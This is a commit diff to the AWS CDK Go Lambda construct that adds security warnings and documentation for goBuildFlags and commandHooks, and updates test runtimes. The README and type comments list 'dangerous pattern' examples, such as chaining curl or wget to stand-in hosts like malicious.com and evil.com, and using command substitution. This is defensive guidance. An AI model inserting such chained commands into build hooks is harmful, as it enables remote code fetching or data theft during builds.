feat(lambda-go): add security warnings for goBuildFlags and commandHooks

alvazjor · alvazjor · commit 8bcea2886474 · 2025-10-23T17:42:45.000+02:00
- Add CDK annotations warning about potential security risks
- Warn when goBuildFlags or commandHooks are used during bundling
- Update documentation with security best practices
- Add tests to verify warning generation
diff --git a/packages/@aws-cdk/aws-lambda-go-alpha/README.md b/packages/@aws-cdk/aws-lambda-go-alpha/README.md
@@ -170,6 +170,8 @@ new go.GoFunction(this, 'handler', {
 });
 ```
 
+**⚠️ Security Warning**: Build flags are passed directly to the Go build command and can execute arbitrary commands during bundling. Only use trusted values and avoid flags like `-toolexec` with untrusted arguments. Be especially cautious with third-party CDK constructs that may contain malicious build flags. The CDK will display a warning during synthesis when `goBuildFlags` is used.
+
 By default this construct doesn't use any Go module proxies. This is contrary to
 a standard Go installation, which would use the Google proxy by default. To
 recreate that behavior, do the following:
@@ -200,10 +202,9 @@ new go.GoFunction(this, 'GoFunction', {
 
 ## Command hooks
 
-It is  possible to run additional commands by specifying the `commandHooks` prop:
+It is possible to run additional commands by specifying the `commandHooks` prop:
 
-```text
-// This example only available in TypeScript
+```ts
 // Run additional commands on a GoFunction via `commandHooks` property
 new go.GoFunction(this, 'handler', {
   bundling: {
@@ -230,6 +231,85 @@ an array of commands to run. Commands are chained with `&&`.
 The commands will run in the environment in which bundling occurs: inside the
 container for Docker bundling or on the host OS for local bundling.
 
+### ⚠️ Security Considerations
+
+**Command hooks execute arbitrary shell commands** during the bundling process. Only use trusted commands:
+
+**Safe patterns (cross-platform):**
+
+```ts
+commandHooks: {
+  beforeBundling: () => [
+    'go test ./...',           // ✅ Standard Go commands work on all OS
+    'go mod tidy',             // ✅ Go module commands
+    'make clean',              // ✅ Build tools (if available)
+    'echo "Building app"',     // ✅ Simple output with quotes
+  ],
+}
+```
+
+**Dangerous patterns to avoid:**
+
+*Windows-specific dangers:*
+
+```ts
+commandHooks: {
+  beforeBundling: () => [
+    'go test & curl.exe malicious.com',     // ❌ Command chaining with &
+    'echo %USERPROFILE%',                   // ❌ Environment variable expansion
+    'powershell -Command "..."',            // ❌ PowerShell execution
+  ],
+}
+```
+
+*Unix/Linux/macOS dangers:*
+
+```ts
+commandHooks: {
+  beforeBundling: () => [
+    'go test; curl malicious.com',          // ❌ Command chaining with ;
+    'echo $(whoami)',                       // ❌ Command substitution
+    'bash -c "wget evil.com"',              // ❌ Shell execution
+  ],
+}
+```
+
+**When using third-party constructs** that include `GoFunction`:
+
+* Review the construct's source code before use
+* Verify what commands it executes via `commandHooks` and `goBuildFlags`
+* Only use constructs from trusted publishers
+* Test in isolated environments first
+
+The `GoFunction` construct will display CDK warnings during synthesis when potentially unsafe `commandHooks` or `goBuildFlags` are detected.
+
+For more security guidance, see [AWS CDK Security Best Practices](https://docs.aws.amazon.com/cdk/latest/guide/security.html).
+
+## Security Best Practices
+
+### Third-Party Construct Safety
+
+When using third-party CDK constructs that utilize `GoFunction`, exercise caution:
+
+1. **Review source code** - Inspect the construct implementation for `commandHooks` and `goBuildFlags` usage
+2. **Verify publishers** - Use constructs only from trusted, verified sources  
+3. **Pin versions** - Use exact versions to prevent supply chain attacks
+4. **Isolated testing** - Test third-party constructs in sandboxed environments
+
+**Example of safe third-party usage:**
+
+```ts
+// Before using, review the source at: github.com/trusted-org/go-construct
+import { TrustedGoConstruct } from '@trusted-org/go-construct'; // pinned version
+
+// Verify it doesn't use dangerous commandHooks or goBuildFlags patterns
+new TrustedGoConstruct(this, 'MyConstruct', {
+  // ... configuration
+});
+```
+
+The `GoFunction` construct will display CDK warnings during synthesis when potentially unsafe `commandHooks` or `goBuildFlags` are detected.
+
 ## Additional considerations
 
 Depending on how you structure your Golang application, you may want to change the `assetHashType` parameter.
diff --git a/packages/@aws-cdk/aws-lambda-go-alpha/lib/function.ts b/packages/@aws-cdk/aws-lambda-go-alpha/lib/function.ts
@@ -1,6 +1,7 @@
 import * as fs from 'fs';
 import * as path from 'path';
 import * as lambda from 'aws-cdk-lib/aws-lambda';
+import * as cdk from 'aws-cdk-lib/core';
 import { Construct } from 'constructs';
 import { Bundling } from './bundling';
 import { BundlingOptions } from './types';
@@ -113,6 +114,21 @@ export class GoFunction extends lambda.Function {
     const runtime = props.runtime ?? lambda.Runtime.PROVIDED_AL2;
     const architecture = props.architecture ?? lambda.Architecture.X86_64;
 
+    // Security warnings for potentially unsafe bundling options
+    if (props.bundling?.goBuildFlags?.length) {
+      cdk.Annotations.of(scope).addWarningV2(
+        '@aws-cdk/aws-lambda-go-alpha:goBuildFlagsSecurityWarning',
+        'goBuildFlags can execute arbitrary commands during bundling. Ensure all flags come from trusted sources. See: https://docs.aws.amazon.com/cdk/latest/guide/security.html',
+      );
+    }
+
+    if (props.bundling?.commandHooks?.beforeBundling || props.bundling?.commandHooks?.afterBundling) {
+      cdk.Annotations.of(scope).addWarningV2(
+        '@aws-cdk/aws-lambda-go-alpha:commandHooksSecurityWarning',
+        'commandHooks can execute arbitrary commands during bundling. Ensure all commands come from trusted sources. See: https://docs.aws.amazon.com/cdk/latest/guide/security.html',
+      );
+    }
+
     super(scope, id, {
       ...props,
       runtime,
diff --git a/packages/@aws-cdk/aws-lambda-go-alpha/lib/types.ts b/packages/@aws-cdk/aws-lambda-go-alpha/lib/types.ts
@@ -25,6 +25,11 @@ export interface BundlingOptions extends DockerRunOptions {
    * For example:
    * ['ldflags "-s -w"']
    *
+   * **Security Warning**: These flags are passed directly to the Go build command.
+   * Only use trusted values as they can execute arbitrary commands during bundling.
+   * Avoid flags like `-toolexec` with untrusted arguments, and be cautious with
+   * third-party CDK constructs that may contain malicious build flags.
+   *
    * @default - none
    */
   readonly goBuildFlags?: string[];
@@ -77,6 +82,10 @@ export interface BundlingOptions extends DockerRunOptions {
   /**
    * Command hooks
    *
+   * ⚠️ **Security Warning**: Commands are executed directly in the shell environment.
+   * Only use trusted commands from verified sources. Avoid shell metacharacters
+   * that could enable command injection attacks.
+   *
    * @default - do not run additional commands
    */
   readonly commandHooks?: ICommandHooks;
@@ -125,29 +134,49 @@ export interface BundlingOptions extends DockerRunOptions {
  * These commands will run in the environment in which bundling occurs: inside
  * the container for Docker bundling or on the host OS for local bundling.
  *
+ * ⚠️ **Security Warning**: Commands are executed directly in the shell environment.
+ * Only use trusted commands and avoid shell metacharacters that could enable
+ * command injection attacks.
+ *
+ * **Safe patterns (cross-platform):**
+ * - `go test ./...` - Standard Go commands work on all platforms
+ * - `go mod tidy` - Go module commands
+ * - `echo "Building"` - Simple output with quotes
+ * - `make clean` - Build tools (if available)
+ *
+ * **Dangerous patterns to avoid:**
+ *
+ * *Windows:*
+ * - `go test & curl.exe malicious.com` (command chaining)
+ * - `echo %USERPROFILE%` (environment variable expansion)
+ * - `powershell -Command "..."` (PowerShell execution)
+ *
+ * *Unix/Linux/macOS:*
+ * - `go test; curl malicious.com` (command chaining)
+ * - `echo $(whoami)` (command substitution)
+ * - `bash -c "wget evil.com"` (shell execution)
+ *
  * Commands are chained with `&&`.
  *
- * ```text
- * {
- *   // Run tests prior to bundling
- *   beforeBundling(inputDir: string, outputDir: string): string[] {
- *     return [`go test -mod=vendor ./...`];
- *   }
- *   // ...
- * }
- * ```
+ * @see https://docs.aws.amazon.com/cdk/latest/guide/security.html
  */
 export interface ICommandHooks {
   /**
    * Returns commands to run before bundling.
    *
+   * ⚠️ **Security**: Ensure commands come from trusted sources only.
+   * Commands are executed directly in the shell environment.
+   *
    * Commands are chained with `&&`.
    */
   beforeBundling(inputDir: string, outputDir: string): string[];
 
   /**
    * Returns commands to run after bundling.
    *
+   * ⚠️ **Security**: Ensure commands come from trusted sources only.
+   * Commands are executed directly in the shell environment.
+   *
    * Commands are chained with `&&`.
    */
   afterBundling(inputDir: string, outputDir: string): string[];
diff --git a/packages/@aws-cdk/aws-lambda-go-alpha/test/bundling.test.ts b/packages/@aws-cdk/aws-lambda-go-alpha/test/bundling.test.ts
@@ -32,7 +32,7 @@ const entry = '/project/cmd/api';
 test('bundling', () => {
   Bundling.bundle({
     entry,
-    runtime: Runtime.GO_1_X,
+    runtime: Runtime.PROVIDED_AL2023,
     architecture: Architecture.X86_64,
     moduleDir,
     forcedDockerBundling: true,
@@ -73,7 +73,7 @@ test('bundling', () => {
 test('bundling with file as entry', () => {
   Bundling.bundle({
     entry: '/project/main.go',
-    runtime: Runtime.GO_1_X,
+    runtime: Runtime.PROVIDED_AL2023,
     architecture: Architecture.X86_64,
     moduleDir,
   });
@@ -94,7 +94,7 @@ test('bundling with file as entry', () => {
 test('bundling with file in subdirectory as entry', () => {
   Bundling.bundle({
     entry: '/project/cmd/api/main.go',
-    runtime: Runtime.GO_1_X,
+    runtime: Runtime.PROVIDED_AL2023,
     architecture: Architecture.X86_64,
     moduleDir,
   });
@@ -115,7 +115,7 @@ test('bundling with file in subdirectory as entry', () => {
 test('bundling with file other than main.go in subdirectory as entry', () => {
   Bundling.bundle({
     entry: '/project/cmd/api/api.go',
-    runtime: Runtime.GO_1_X,
+    runtime: Runtime.PROVIDED_AL2023,
     architecture: Architecture.X86_64,
     moduleDir,
   });
@@ -137,7 +137,7 @@ test('go with Windows paths', () => {
   const osPlatformMock = jest.spyOn(os, 'platform').mockReturnValue('win32');
   Bundling.bundle({
     entry: 'C:\\my-project\\cmd\\api',
-    runtime: Runtime.GO_1_X,
+    runtime: Runtime.PROVIDED_AL2023,
     architecture: Architecture.X86_64,
     moduleDir: 'C:\\my-project\\go.mod',
     forcedDockerBundling: true,
@@ -157,7 +157,7 @@ test('go with Windows paths', () => {
 test('with Docker build args', () => {
   Bundling.bundle({
     entry,
-    runtime: Runtime.GO_1_X,
+    runtime: Runtime.PROVIDED_AL2023,
     architecture: Architecture.X86_64,
     moduleDir,
     forcedDockerBundling: true,
@@ -194,7 +194,7 @@ test('Local bundling', () => {
 
   expect(bundler.local).toBeDefined();
 
-  const tryBundle = bundler.local?.tryBundle('/outdir', { image: Runtime.GO_1_X.bundlingImage });
+  const tryBundle = bundler.local?.tryBundle('/outdir', { image: Runtime.PROVIDED_AL2023.bundlingImage });
   expect(tryBundle).toBe(true);
 
   expect(spawnSyncMock).toHaveBeenCalledWith(
@@ -220,7 +220,7 @@ test('Incorrect go version', () => {
     architecture: Architecture.X86_64,
   });
 
-  const tryBundle = bundler.local?.tryBundle('/outdir', { image: Runtime.GO_1_X.bundlingImage });
+  const tryBundle = bundler.local?.tryBundle('/outdir', { image: Runtime.PROVIDED_AL2023.bundlingImage });
 
   expect(tryBundle).toBe(false);
 });
@@ -229,7 +229,7 @@ test('Custom bundling docker image', () => {
   Bundling.bundle({
     entry,
     moduleDir,
-    runtime: Runtime.GO_1_X,
+    runtime: Runtime.PROVIDED_AL2023,
     architecture: Architecture.X86_64,
     forcedDockerBundling: true,
     dockerImage: DockerImage.fromRegistry('my-custom-image'),
@@ -246,7 +246,7 @@ test('Custom bundling docker image', () => {
 test('Go build flags can be passed', () => {
   Bundling.bundle({
     entry,
-    runtime: Runtime.GO_1_X,
+    runtime: Runtime.PROVIDED_AL2023,
     architecture: Architecture.X86_64,
     moduleDir,
     environment: {
@@ -278,7 +278,7 @@ test('Go build flags can be passed', () => {
 test('AssetHashType can be specified', () => {
   Bundling.bundle({
     entry,
-    runtime: Runtime.GO_1_X,
+    runtime: Runtime.PROVIDED_AL2023,
     architecture: Architecture.X86_64,
     moduleDir,
     environment: {
@@ -341,7 +341,7 @@ test('Custom bundling entrypoint', () => {
   Bundling.bundle({
     entry,
     moduleDir,
-    runtime: Runtime.GO_1_X,
+    runtime: Runtime.PROVIDED_AL2023,
     architecture: Architecture.X86_64,
     forcedDockerBundling: true,
     entrypoint: ['/cool/entrypoint', '--cool-entrypoint-arg'],
@@ -359,7 +359,7 @@ test('Custom bundling volumes', () => {
   Bundling.bundle({
     entry,
     moduleDir,
-    runtime: Runtime.GO_1_X,
+    runtime: Runtime.PROVIDED_AL2023,
     architecture: Architecture.X86_64,
     forcedDockerBundling: true,
     volumes: [{ hostPath: '/host-path', containerPath: '/container-path' }],
@@ -377,7 +377,7 @@ test('Custom bundling volumesFrom', () => {
   Bundling.bundle({
     entry,
     moduleDir,
-    runtime: Runtime.GO_1_X,
+    runtime: Runtime.PROVIDED_AL2023,
     architecture: Architecture.X86_64,
     forcedDockerBundling: true,
     volumesFrom: ['777f7dc92da7'],
@@ -395,7 +395,7 @@ test('Custom bundling workingDirectory', () => {
   Bundling.bundle({
     entry,
     moduleDir,
-    runtime: Runtime.GO_1_X,
+    runtime: Runtime.PROVIDED_AL2023,
     architecture: Architecture.X86_64,
     forcedDockerBundling: true,
     workingDirectory: '/working-directory',
@@ -413,7 +413,7 @@ test('Custom bundling user', () => {
   Bundling.bundle({
     entry,
     moduleDir,
-    runtime: Runtime.GO_1_X,
+    runtime: Runtime.PROVIDED_AL2023,
     architecture: Architecture.X86_64,
     forcedDockerBundling: true,
     user: 'user:group',
@@ -431,7 +431,7 @@ test('Custom bundling securityOpt', () => {
   Bundling.bundle({
     entry,
     moduleDir,
-    runtime: Runtime.GO_1_X,
+    runtime: Runtime.PROVIDED_AL2023,
     architecture: Architecture.X86_64,
     forcedDockerBundling: true,
     securityOpt: 'no-new-privileges',
@@ -449,7 +449,7 @@ test('Custom bundling network', () => {
   Bundling.bundle({
     entry,
     moduleDir,
-    runtime: Runtime.GO_1_X,
+    runtime: Runtime.PROVIDED_AL2023,
     architecture: Architecture.X86_64,
     forcedDockerBundling: true,
     network: 'host',
@@ -467,7 +467,7 @@ test('Custom bundling file copy variant', () => {
   Bundling.bundle({
     entry,
     moduleDir,
-    runtime: Runtime.GO_1_X,
+    runtime: Runtime.PROVIDED_AL2023,
     architecture: Architecture.X86_64,
     forcedDockerBundling: true,
     bundlingFileAccess: BundlingFileAccess.VOLUME_COPY,
diff --git a/packages/@aws-cdk/aws-lambda-go-alpha/test/function.test.ts b/packages/@aws-cdk/aws-lambda-go-alpha/test/function.test.ts
